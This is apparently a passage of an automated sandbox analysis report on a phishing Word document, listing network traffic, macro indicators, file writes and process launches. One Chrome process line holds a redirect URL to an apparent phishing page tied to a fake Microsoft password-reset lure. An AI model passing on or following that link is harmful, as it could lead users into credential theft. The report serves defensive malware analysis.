    Source: unknownNetwork traffic detected: HTTP traffic on port 49678 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
    Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49854 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
    Source: unknownNetwork traffic detected: HTTP traffic on port 49738 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
    Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
    Source: unknownNetwork traffic detected: HTTP traffic on port 49761 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49832 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 49750 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
    Source: unknownHTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.17:49700 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49703 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 40.126.32.68:443 -> 192.168.2.17:49704 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 172.202.163.200:443 -> 192.168.2.17:49751 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 13.107.5.88:443 -> 192.168.2.17:49773 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 2.23.209.179:443 -> 192.168.2.17:49775 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 204.79.197.200:443 -> 192.168.2.17:49841 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 204.79.197.222:443 -> 192.168.2.17:49848 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.108.10.254:443 -> 192.168.2.17:49852 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 52.108.10.254:443 -> 192.168.2.17:49856 version: TLS 1.2
    Source: harvardanglia2008officeonline.xsl.0.drOLE indicator, VBA macros: true
    Source: gb.xsl.0.drOLE indicator, VBA macros: true
    Source: sist02.xsl.0.drOLE indicator, VBA macros: true
    Source: gostname.xsl.0.drOLE indicator, VBA macros: true
    Source: chicago.xsl.0.drOLE indicator, VBA macros: true
    Source: turabian.xsl.0.drOLE indicator, VBA macros: true
    Source: iso690nmerical.xsl.0.drOLE indicator, VBA macros: true
    Source: APASixthEditionOfficeOnline.xsl.0.drOLE indicator, VBA macros: true
    Source: mlaseventheditionofficeonline.xsl.0.drOLE indicator, VBA macros: true
    Source: ieee2006officeonline.xsl.0.drOLE indicator, VBA macros: true
    Source: iso690.xsl.0.drOLE indicator, VBA macros: true
    Source: gosttitle.xsl.0.drOLE indicator, VBA macros: true
    Source: harvardanglia2008officeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: gb.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: sist02.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: gostname.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: chicago.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: turabian.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: iso690nmerical.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: APASixthEditionOfficeOnline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: mlaseventheditionofficeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: ieee2006officeonline.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: iso690.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: ~WRF{6952B259-8B79-4E7E-8833-0C31178AEC38}.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: gosttitle.xsl.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeWindow title found: microsoft online password reset - google chrome chrome legacy window
    Source: classification engineClassification label: mal72.phis.winDOCX@22/280@49/17
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Roaming\Microsoft\OfficeJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Temp\{74C349BB-2D48-421D-9E91-C0AF6D2153BA} - OProcSessId.datJump to behavior
    Source: Insight design set.dotx.0.drOLE indicator, Word Document stream: true
    Source: Equations.dotx.0.drOLE indicator, Word Document stream: true
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drOLE indicator, Word Document stream: true
    Source: Element design set.dotx.0.drOLE indicator, Word Document stream: true
    Source: msoE848.tmp.0.drOLE indicator, Word Document stream: true
    Source: ~WRF{6952B259-8B79-4E7E-8833-0C31178AEC38}.tmp.0.drOLE document summary: title field not present or empty
    Source: ~WRF{6952B259-8B79-4E7E-8833-0C31178AEC38}.tmp.0.drOLE document summary: author field not present or empty
    Source: ~WRF{6952B259-8B79-4E7E-8833-0C31178AEC38}.tmp.0.drOLE document summary: edited time not present or 0
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\WINWORD.EXE" /n "C:\Users\user\Desktop\NoteID [4962398] _Secure_Document_Mrettinger-46568.docx" /o ""
    Source: unknownProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument https://r.neurotags.net/?e=email-activity&h=PROD&u=60e82f265911d0314d7422c2&ue=consumer&cl=5e2e8dd7fcfabf10d812e952&c=61dec6ecbd90fb61c1705cd7&cs=1&ec=0&a=link-clicked&rt=Read%20More.&r=https://sepedatua.com/158983/secure-redirect#Mrettinger+dcndx.com
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1920,i,2782846156800102121,14241505822711078173,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
    Source: unknownProcess created: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe "C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exe" -ServerName:App.AppX2y379sjp88wjq1y80217mddj3fargf2y.mca
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2124 --field-trial-handle=1920,i,2782846156800102121,14241505822711078173,262144 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8Jump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: unknown unknownJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: cortana.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: sharedlibrary.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: mrt100_app.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: wintypes.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: vcruntime140_app.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: dpapi.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: mrt100.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: kernel.appcore.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: rmclient.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: twinapi.appcore.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: windows.ui.xaml.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: coremessaging.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: bcp47langs.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: iertutil.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: dcomp.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: windows.staterepositorycore.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: windows.ui.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: windowmanagementapi.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: textinputframework.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: inputhost.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: propsys.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: coreuicomponents.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: ntmarta.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: uxtheme.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: urlmon.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: srvcli.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: netutils.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: dxgi.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: resourcepolicyclient.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: mrmcorer.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: windows.staterepositoryclient.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: d3d11.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: d3d10warp.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: dxcore.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: d2d1.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: dwrite.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: textshaping.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: profapi.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: bcp47mrm.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: windows.shell.servicehostbuilder.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: execmodelproxy.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: uiamanager.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: windows.ui.core.textinput.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: windows.ui.immersive.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: dataexchange.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: cryptbase.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: windows.globalization.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: windows.ui.xaml.controls.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: directmanipulation.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeSection loaded: threadpoolwinrt.dllJump to behavior
    Source: C:\Program Files\WindowsApps\Microsoft.549981C3F5F10_4.2308.1005.0_x64__8wekyb3d8bbwe\Cortana.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{95E15D0A-66E6-93D9-C53C-76E6219D3341}\InProcServer32Jump to behavior
    Source: NoteID [4962398] _Secure_Document_Mrettinger-46568.LNK.0.drLNK file: ..\..\..\..\..\Desktop\NoteID [4962398] _Secure_Document_Mrettinger-46568.docx
    Source: Google Drive.lnk.10.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: YouTube.lnk.10.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Sheets.lnk.10.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Gmail.lnk.10.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Slides.lnk.10.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Docs.lnk.10.drLNK file: ..\..\..\..\..\..\..\..\..\Program Files\Google\Chrome\Application\chrome_proxy.exe
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/media/image2.jpg
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = word/media/image10.jpeg
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
    Source: Insight design set.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
    Source: Equations.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/theme/_rels/theme1.xml.rels
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/_rels/settings.xml.rels
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = word/glossary/stylesWithEffects.xml
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/item2.xml
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/itemProps3.xml
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/item3.xml
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = customXml/_rels/item3.xml.rels
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
    Source: Text Sidebar (Annual Report Red and Black design).docx.0.drInitial sample: OLE zip file path = docProps/custom.xml
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/settings.xml
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/_rels/document.xml.rels
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/document.xml
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/fontTable.xml
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/webSettings.xml
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = word/glossary/styles.xml
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/itemProps2.xml
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/item2.xml
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = customXml/_rels/item2.xml.rels
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = [trash]/0000.dat
    Source: Element design set.dotx.0.drInitial sample: OLE zip file path = docProps/custom.xml
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
    Source: Insight design set.dotx.0.drInitial sample: OLE indicators vbamacros = False
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome AppsJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Google Drive.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\YouTube.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Sheets.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Gmail.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Slides.lnkJump to behavior
    Source: C:\Program Files\Google\Chrome\Application\chrome.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Chrome Apps\Docs.lnkJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
